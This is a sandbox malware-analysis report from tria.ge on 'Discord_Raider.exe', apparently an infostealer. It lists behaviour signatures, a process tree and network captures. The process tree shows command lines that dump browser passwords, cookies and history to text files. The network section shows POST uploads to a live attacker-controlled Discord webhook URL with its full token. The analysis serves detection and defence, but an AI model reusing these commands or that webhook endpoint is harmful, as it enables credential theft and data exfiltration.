Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

13/04/2023, 17:36 UTC

230413-v6r57ada84 9

13/04/2023, 17:34 UTC

230413-v5dleaec8w 9

13/04/2023, 16:59 UTC

230413-vhwtgaeb6w 9

Analysis

  • max time kernel
    23s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/04/2023, 17:34 UTC

General

  • Target

    Discord_Raider.exe

  • Size

    2.8MB

  • MD5

    5238bf37a0c3a5501ecf2ede42e5f7e3

  • SHA1

    08618aba7eae5b2b630871b62cd34b6f35a93af9

  • SHA256

    736638cd73af6c935574c399d9df6734707935ec6a417adf9f399598dc5e8657

  • SHA512

    e40a2d64155c01185818104b3ddf2e89ad4471977f0e8795718f6dbde043a2e152d3a004fcd52d518277c79d12678bfb930a328038db596fd8cd5b23d6fe6ea5

  • SSDEEP

    49152:YsmhnqAs9pJc0dnKh+Q0N1rs+vIUSg+6+8ohnRh1Na1OKM6nYAKhFQpSH3Oh5gxr:SqXpy05Q0N1rsYSZ6BoXh1kkypSH3Ohs

Score
9/10

Malware Config

Signatures

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 10 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Discord_Raider.exe
    "C:\Users\Admin\AppData\Local\Temp\Discord_Raider.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4940
    • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
      "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs6gJSKY3RhQ79JCJSFqEll6W3JbKxPovOOtZyi89x1/Whf/AOhzqqRCYGErJh6WrRWrmL8maS2ZsDaJWmpU2R8fmZ0XTjwlWNle4CsXiZiQSiWXj9847FLpSpCrIedRLk8=
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4852
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2312
          • C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
            C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"
            5⤵
            • Executes dropped EXE
            PID:1428
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2604
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2220
          • C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
            C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3688
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4484
          • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
            C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
            5⤵
              PID:3692
            • C:\Users\Admin\AppData\Local\Temp\hh.exe
              C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:5072
            • C:\Users\Admin\AppData\Local\Temp\splwow64.exe
              C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
              5⤵
              • Executes dropped EXE
              PID:5076
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3440
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c compile.bat
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3904
            • C:\Users\Admin\AppData\Local\Temp\xwizard.exe
              C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
              5⤵
              • Executes dropped EXE
              PID:1284
        • C:\Windows\SYSTEM32\shutdown.exe
          "shutdown" /r /s /t 0
          3⤵
            PID:1308
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
            3⤵
              PID:2280
              • C:\Windows\system32\choice.exe
                choice /C Y /N /D Y /T 3
                4⤵
                  PID:4836
          • C:\Windows\system32\taskmgr.exe
            "C:\Windows\system32\taskmgr.exe" /4
            1⤵
            • Checks SCSI registry key(s)
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:3176
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:2832
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              2⤵
              • Checks processor information in registry
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1100
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.0.1397007436\1822598252" -parentBuildID 20221007134813 -prefsHandle 1840 -prefMapHandle 1832 -prefsLen 20890 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e4d05ae-26b9-4b2b-a798-b12b8473f74c} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 1932 14651818958 gpu
                3⤵
                  PID:3892
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.1.1848927993\1613693819" -parentBuildID 20221007134813 -prefsHandle 2320 -prefMapHandle 2316 -prefsLen 20926 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3c30f06-844b-4bd6-80fd-9140ac02d74d} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 2332 1465070c858 socket
                  3⤵
                    PID:3744
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.2.1010006526\734500763" -childID 1 -isForBrowser -prefsHandle 2884 -prefMapHandle 2916 -prefsLen 21074 -prefMapSize 232675 -jsInitHandle 1448 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c62f160-a0ed-440e-90cb-061eadca938c} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 2936 1465450f158 tab
                    3⤵
                      PID:2768
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.3.1457252461\786928985" -childID 2 -isForBrowser -prefsHandle 3592 -prefMapHandle 3588 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1448 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ffe8f1c-3f52-4d8c-9181-29bbb6148e1b} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 3604 14651ec1358 tab
                      3⤵
                      • Executes dropped EXE
                      PID:3692
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.4.79209462\1238169498" -childID 3 -isForBrowser -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1448 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab9f5513-b7b4-47bb-9eac-7c2a80fa7224} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 4200 14655f04d58 tab
                      3⤵
                        PID:4432
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.5.1777288847\2060643370" -childID 4 -isForBrowser -prefsHandle 5072 -prefMapHandle 4980 -prefsLen 26738 -prefMapSize 232675 -jsInitHandle 1448 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {791dd0dd-67c4-4b63-96e2-3e7f1a8cd8b5} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 5080 14655c97058 tab
                        3⤵
                          PID:2264
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.7.140519835\601933985" -childID 6 -isForBrowser -prefsHandle 5264 -prefMapHandle 5256 -prefsLen 26738 -prefMapSize 232675 -jsInitHandle 1448 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {639c4961-d5a0-430b-a93a-883066595ba5} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 5284 1465728d758 tab
                          3⤵
                            PID:2988
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.6.107803741\1304799353" -childID 5 -isForBrowser -prefsHandle 5156 -prefMapHandle 5160 -prefsLen 26738 -prefMapSize 232675 -jsInitHandle 1448 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b97e8bc-bbf7-4945-a57d-1496badcae8d} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 5252 1465728d158 tab
                            3⤵
                              PID:1752
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.8.932941723\1146030446" -childID 7 -isForBrowser -prefsHandle 5804 -prefMapHandle 5808 -prefsLen 26738 -prefMapSize 232675 -jsInitHandle 1448 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9f07af0-8f4b-488a-a39d-913aca208566} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 5820 14651ec2258 tab
                              3⤵
                                PID:3376
                          • C:\Windows\System32\rundll32.exe
                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            1⤵
                              PID:1740
                            • C:\Users\Admin\AppData\Local\Temp\Discord_Raider.exe
                              "C:\Users\Admin\AppData\Local\Temp\Discord_Raider.exe"
                              1⤵
                                PID:1400
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 1400 -s 1148
                                  2⤵
                                  • Program crash
                                  PID:1632
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -pss -s 408 -p 1400 -ip 1400
                                1⤵
                                  PID:5052
                                • C:\Users\Admin\AppData\Local\Temp\Discord_Raider.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Discord_Raider.exe"
                                  1⤵
                                    PID:4888
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 4888 -s 1092
                                      2⤵
                                      • Program crash
                                      PID:1664
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -pss -s 420 -p 4888 -ip 4888
                                    1⤵
                                      PID:472

                                    Network

                                    • flag-us
                                      DNS
                                      196.249.167.52.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      196.249.167.52.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      254.105.26.67.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      254.105.26.67.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      8.3.197.209.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      8.3.197.209.in-addr.arpa
                                      IN PTR
                                      Response
                                      8.3.197.209.in-addr.arpa
                                      IN PTR
                                      vip0x008map2sslhwcdnnet
                                    • flag-us
                                      DNS
                                      itroublvehacker.gq
                                      RtkBtManServ.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      itroublvehacker.gq
                                      IN A
                                      Response
                                    • flag-us
                                      DNS
                                      95.221.229.192.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      95.221.229.192.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      api64.ipify.org
                                      RtkBtManServ.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      api64.ipify.org
                                      IN A
                                      Response
                                      api64.ipify.org
                                      IN A
                                      173.231.16.75
                                      api64.ipify.org
                                      IN A
                                      104.237.62.213
                                      api64.ipify.org
                                      IN A
                                      64.185.227.158
                                    • flag-us
                                      GET
                                      https://api64.ipify.org/
                                      RtkBtManServ.exe
                                      Remote address:
                                      173.231.16.75:443
                                      Request
                                      GET / HTTP/1.1
                                      Host: api64.ipify.org
                                      Connection: Keep-Alive
                                      Response
                                      HTTP/1.1 200 OK
                                      Content-Length: 12
                                      Content-Type: text/plain
                                      Date: Thu, 13 Apr 2023 17:34:20 GMT
                                      Vary: Origin
                                    • flag-us
                                      DNS
                                      discord.com
                                      RtkBtManServ.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      discord.com
                                      IN A
                                      Response
                                      discord.com
                                      IN A
                                      162.159.135.232
                                      discord.com
                                      IN A
                                      162.159.128.233
                                      discord.com
                                      IN A
                                      162.159.138.232
                                      discord.com
                                      IN A
                                      162.159.136.232
                                      discord.com
                                      IN A
                                      162.159.137.232
                                    • flag-us
                                      GET
                                      https://discord.com/api/v6/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-
                                      RtkBtManServ.exe
                                      Remote address:
                                      162.159.135.232:443
                                      Request
                                      GET /api/v6/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba- HTTP/1.1
                                      accept-encoding: gzip, deflate
                                      accept: */*
                                      user-agent: DiscordBot (https://github.com/RogueException/Discord.Net, v2.3.1)
                                      X-RateLimit-Precision: second
                                      Host: discord.com
                                      Connection: Keep-Alive
                                      Response
                                      HTTP/1.1 200 OK
                                      Date: Thu, 13 Apr 2023 17:34:20 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      set-cookie: __dcfduid=6c88fd04da2111eda5107e5e466fc321; Expires=Tue, 11-Apr-2028 17:34:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      content-encoding: gzip
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I1hvf%2B2iBDbpw3KfyzkfzFKxBnq%2BM9U7Qcg4ff2sz6DTzHaW5dLRYRoSgMLMiiGY%2BeduCqq4ulm96QrKURKg7dP4P7lUonE1L9pq5qSYarJXtPUcxdYD0kUpXoYD"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Set-Cookie: __sdcfduid=6c88fd04da2111eda5107e5e466fc3210750a78d307a72577449f465241127132665b3e1f2168cd435caa825e0f5e6ab; Expires=Tue, 11-Apr-2028 17:34:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      Set-Cookie: __cfruid=3b9ce1cc265680132c6253283ce05a8503817a17-1681407260; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 7b7575938ae6b794-AMS
                                    • flag-us
                                      POST
                                      https://discord.com/api/v6/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-?wait=true
                                      RtkBtManServ.exe
                                      Remote address:
                                      162.159.135.232:443
                                      Request
                                      POST /api/v6/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-?wait=true HTTP/1.1
                                      accept-encoding: gzip, deflate
                                      accept: */*
                                      user-agent: DiscordBot (https://github.com/RogueException/Discord.Net, v2.3.1)
                                      X-RateLimit-Precision: second
                                      Content-Type: application/json; charset=utf-8
                                      Host: discord.com
                                      Content-Length: 574
                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 200 OK
                                      Date: Thu, 13 Apr 2023 17:34:21 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      set-cookie: __dcfduid=6cfb9490da2111ed9d9ace8509810516; Expires=Tue, 11-Apr-2028 17:34:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1681407262
                                      x-ratelimit-reset-after: 1
                                      content-encoding: gzip
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0CCvB2lT0AhSiVnHyhtlVnJFRXg0OU5xHK6CX%2FEYKuEnd0JWW6TY9GFrF01bifn0LjgXID7bBeRZks8enPsreHBibLuP3RFdBF7kYvsVYgE%2Fsei4Pa68jaTS%2BZwc"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Set-Cookie: __sdcfduid=6cfb9490da2111ed9d9ace85098105163c91d3b662120c840a835e2561a8170dd6377661d82fd65102b97300b6dccc6a; Expires=Tue, 11-Apr-2028 17:34:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      Set-Cookie: __cfruid=acdc542971fdb6fd52930baea08e17542dd623c2-1681407261; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 7b757596dea9b794-AMS
                                    • flag-us
                                      POST
                                      https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-
                                      RtkBtManServ.exe
                                      Remote address:
                                      162.159.135.232:443
                                      Request
                                      POST /api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba- HTTP/1.1
                                      Content-Type: multipart/form-data; boundary="9e0e9605-63b8-4a1a-9912-8d2c6ac19d05"
                                      Host: discord.com
                                      Content-Length: 366071
                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 400 Bad Request
                                      Date: Thu, 13 Apr 2023 17:34:22 GMT
                                      Content-Type: application/json
                                      Content-Length: 80
                                      Connection: keep-alive
                                      set-cookie: __dcfduid=6d3c13bcda2111edb8668e767f5a6105; Expires=Tue, 11-Apr-2028 17:34:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1681407263
                                      x-ratelimit-reset-after: 1
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f6Lvx9kgm%2FMxFzZKB7OwVj25jCkiXBjRx7kl1FCaG%2BNniJWMz6UOC%2FG1BUSKMwxBQqVo8T5qb%2FVzXTlSjjQ8wREwvg50KZj7QD3rvFEkU0HQYU7i2w8SvySkrzP5"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Set-Cookie: __sdcfduid=6d3c13bcda2111edb8668e767f5a61052053e49e7b4ddb476b8c3f315b7e87c763b17170fe4c30851f81453455038397; Expires=Tue, 11-Apr-2028 17:34:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      Set-Cookie: __cfruid=fd2ab38786ab98f481c14672c8a910e4ad152c01-1681407262; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 7b7575981f19b891-AMS
                                    • flag-us
                                      DNS
                                      75.16.231.173.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      75.16.231.173.in-addr.arpa
                                      IN PTR
                                      Response
                                      75.16.231.173.in-addr.arpa
                                      IN PTR
                                      173-231-16-75staticwebnxcom
                                    • flag-us
                                      DNS
                                      232.135.159.162.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      232.135.159.162.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      POST
                                      https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-
                                      RtkBtManServ.exe
                                      Remote address:
                                      162.159.135.232:443
                                      Request
                                      POST /api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba- HTTP/1.1
                                      Content-Type: multipart/form-data; boundary="b0bb15c4-bb2e-4b93-9267-8add87a521c7"
                                      Host: discord.com
                                      Content-Length: 455
                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 400 Bad Request
                                      Date: Thu, 13 Apr 2023 17:34:25 GMT
                                      Content-Type: application/json
                                      Content-Length: 80
                                      Connection: keep-alive
                                      set-cookie: __dcfduid=6f532df2da2111ed8dd3baba4f112423; Expires=Tue, 11-Apr-2028 17:34:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1681407266
                                      x-ratelimit-reset-after: 1
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=71VENHht1%2Fy2hg6trn6%2Fnw%2BXjA%2FPJnLsrwV2KZ1MgnkptSzkz5K18Zj8jp8AWllXf5VW4GwmJod1I1dovY0V02YdSl1Ndoi%2FfXDhYMZSkkc6I9pySKFHUPVtag%2B%2F"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Set-Cookie: __sdcfduid=6f532df2da2111ed8dd3baba4f1124233fdb3bc7398675df67a3c1149e670a24487d86835f09bf3801bba3e86b595a87; Expires=Tue, 11-Apr-2028 17:34:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      Set-Cookie: __cfruid=7c6c088bf52011adf719b67f8fd0972835f4dda6-1681407265; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 7b7575b048c31c8d-AMS
                                    • flag-us
                                      POST
                                      https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-
                                      RtkBtManServ.exe
                                      Remote address:
                                      162.159.135.232:443
                                      Request
                                      POST /api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba- HTTP/1.1
                                      Content-Type: multipart/form-data; boundary="697321f1-6d40-495b-85de-e6be688ceb42"
                                      Host: discord.com
                                      Content-Length: 4893
                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 400 Bad Request
                                      Date: Thu, 13 Apr 2023 17:34:27 GMT
                                      Content-Type: application/json
                                      Content-Length: 80
                                      Connection: keep-alive
                                      set-cookie: __dcfduid=70701b28da2111edb3b9c6606182821c; Expires=Tue, 11-Apr-2028 17:34:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1681407268
                                      x-ratelimit-reset-after: 1
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l14LzhvimBxqy8ExaJRHkG6E4uYnGcBl7vrelHZeku5zBzAuS7kzCzdjkNxxs87JD6fJdWHWxx4Mj2QFMO4t56tixCf1XKWRsSYTlTTDusF%2F4OaU%2Fk2WUKpeqK7E"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Set-Cookie: __sdcfduid=70701b28da2111edb3b9c6606182821c1ee64cf50c2181f4e69437c4d3511ad94e35557629631a362cd367afb3481050; Expires=Tue, 11-Apr-2028 17:34:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      Set-Cookie: __cfruid=274b7cb15538a264ad5cacd9f5560aada35f58c3-1681407267; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 7b7575bc3d820ea8-AMS
                                    • flag-us
                                      POST
                                      https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-
                                      RtkBtManServ.exe
                                      Remote address:
                                      162.159.135.232:443
                                      Request
                                      POST /api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba- HTTP/1.1
                                      Content-Type: multipart/form-data; boundary="8d884f2e-fc31-40bb-a4ff-43c9be3e6ce2"
                                      Host: discord.com
                                      Content-Length: 6877
